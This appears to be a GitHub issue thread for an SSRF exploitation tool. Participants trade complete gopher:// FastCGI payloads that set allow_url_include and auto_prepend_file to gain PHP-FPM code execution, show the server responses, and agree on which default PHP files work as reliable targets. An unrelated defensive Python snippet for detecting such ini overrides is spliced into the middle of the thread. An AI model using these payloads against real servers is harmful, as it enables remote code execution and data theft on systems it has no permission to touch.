fastcgi: Clear security.limit_extensions value #6

Closed
mpchadwick opened this Issue Feb 1, 2019 · 9 comments


mpchadwick commented Feb 1, 2019

There's a good chance of finding phar files in standard locations according to their installation guides.

E.g.

Currently I get error below when trying to use with /usr/local/bin/composer

curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/local/bin/composer%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
_Access to the script '/usr/local/bin/composer' has been denied (see security.limit_extensions)
jStatus: 403 Forbidden
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8

Access denied.
5 G%

tarunkant commented Feb 1, 2019

Hey, if we wanted to look at the file which doesn't have permissions, then why don't we first get the RCE through the default file location and then try to read the file you want or find the files you want.

@tarunkant tarunkant closed this Feb 4, 2019

mpchadwick commented Feb 5, 2019

@tarunkant what I'm suggesting is that the payload be updated to clear the security.limit_extensions directive.

I believe doing this would remove the requirement to know the location of a .php file on the system.

I've been trying to understand how to edit FastCGI.py to send that directive, but can't figure out how to do it and ensure the FastCGI packets are still valid.

If it helps, I mean something like this:

908d138

mpchadwick commented Feb 5, 2019

Hmm, I figured out the FCGI_PARAMS format; however, it turns out I was mistaken. PHP-FPM will not allow you to set the directive this way...

curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0C%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH63%0E%04REQUEST_METHODPOST%09hPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asecurity.limit_extensions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%02SCRIPT_FILENAMEls%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3F%04%00%3C%3Fphp%20system%28%27/etc/passwd%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
hPassing INI directive through FastCGI: unable to set 'security.limit_extensions'
Primary script unknown
kStatus: 404 Not Found
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8

File not found.
no-%
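For the FCGI_PARAMS encoding discussed in the comment above, here is an added example (not code from the Gopherus project or the issue author) written from the detection side: it decodes a PARAMS record body using the FastCGI name-value length rules (one length byte below 128, otherwise four bytes with the high bit set) and flags PHP_VALUE / PHP_ADMIN_VALUE lines that override the ini directives this thread relies on. The sample record is constructed inline from the parameter names used in the issue; the RISKY_DIRECTIVES set is my own choice, not a PHP-FPM list.

```python
import struct
from typing import Dict, List, Tuple

# Directives the thread shows being pushed through PHP_VALUE. Seeing any of them
# in a FastCGI stream that did not come from the web server is an alert condition.
RISKY_DIRECTIVES = {"allow_url_include", "auto_prepend_file", "auto_append_file",
                    "disable_functions", "open_basedir", "security.limit_extensions"}

def _read_len(buf: bytes, pos: int) -> Tuple[int, int]:
    """FastCGI length field: 1 byte if < 128, else 4 bytes big-endian with the top bit set."""
    if buf[pos] >> 7 == 0:
        return buf[pos], pos + 1
    return struct.unpack(">I", buf[pos:pos + 4])[0] & 0x7FFFFFFF, pos + 4

def decode_params(payload: bytes) -> Dict[str, str]:
    """Decode the body of an FCGI_PARAMS record (nameLen, valueLen, name, value ...)."""
    params, pos = {}, 0
    while pos < len(payload):
        nlen, pos = _read_len(payload, pos)
        vlen, pos = _read_len(payload, pos)
        name = payload[pos:pos + nlen].decode("latin-1"); pos += nlen
        value = payload[pos:pos + vlen].decode("latin-1"); pos += vlen
        params[name] = value
    return params

def risky_ini_overrides(params: Dict[str, str]) -> List[str]:
    """Return 'KEY: directive=value' for every risky directive set via PHP_VALUE/PHP_ADMIN_VALUE."""
    hits = []
    for key in ("PHP_VALUE", "PHP_ADMIN_VALUE"):
        for line in params.get(key, "").splitlines():
            directive, sep, value = line.partition("=")
            if sep and directive.strip() in RISKY_DIRECTIVES:
                hits.append(f"{key}: {directive.strip()}={value.strip()}")
    return hits

def _nv(name: str, value: str) -> bytes:
    """Encode one name-value pair; used only to build the constructed sample below."""
    out = b""
    for part in (name, value):
        n = len(part)
        out += bytes([n]) if n < 128 else struct.pack(">I", n | 0x80000000)
    return out + name.encode() + value.encode()

# Constructed sample PARAMS body mirroring the parameter names in the issue's payload.
SAMPLE_PARAMS = b"".join([
    _nv("SERVER_SOFTWARE", "go / fcgiclient "),
    _nv("REMOTE_ADDR", "127.0.0.1"),
    _nv("REQUEST_METHOD", "POST"),
    _nv("PHP_VALUE", "allow_url_include = On\ndisable_functions = \nauto_prepend_file = php://input"),
    _nv("SCRIPT_FILENAME", "/usr/share/php/PEAR.php"),
    _nv("DOCUMENT_ROOT", "/"),
])
```

Feeding a captured PARAMS body from a FastCGI socket exposed beyond the web server into `decode_params` and `risky_ini_overrides` gives a quick triage of whether someone is rewriting php.ini per request.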

tarunkant commented Feb 5, 2019

Hey, your payload is incorrect because in the place of FILE_NAME you wrote ls and in the place of COMMAND you wrote /etc/passwd.
And are we able to disable security.limit_extensions (I think no)?

tarunkant commented Feb 5, 2019

Btw, you can put the file name /etc/passwd, but it's preferable to put a .php extension file (btw, I did put one default file, which will always be there if PHP is installed).

mpchadwick commented Feb 6, 2019

@tarunkant thanks for all the follow-up here. Just to note, it's not true that /usr/share/php/PEAR.php will always be present (which is why I was seeing if it's possible to use a file that isn't .php by modifying the security.limit_extensions directive).

[vagrant@localhost magento-1-14-4-0-ee]$ stat /usr/share/php/PEAR.php
stat: cannot stat ‘/usr/share/php/PEAR.php’: No such file or directory
[vagrant@localhost magento-1-14-4-0-ee]$ which php
/usr/bin/php

Unfortunately, as far as I can tell PHP-FPM does not allow changing security.limit_extensions this way.

mpchadwick commented Feb 6, 2019

Turns out the file is present on my system, just in a slightly different location.

/usr/share/pear/PEAR.php

tarunkant commented Feb 6, 2019

Cool, you can also check with /etc/passwd, it will work.

mpchadwick commented Feb 6, 2019

You're right. It does work for me.
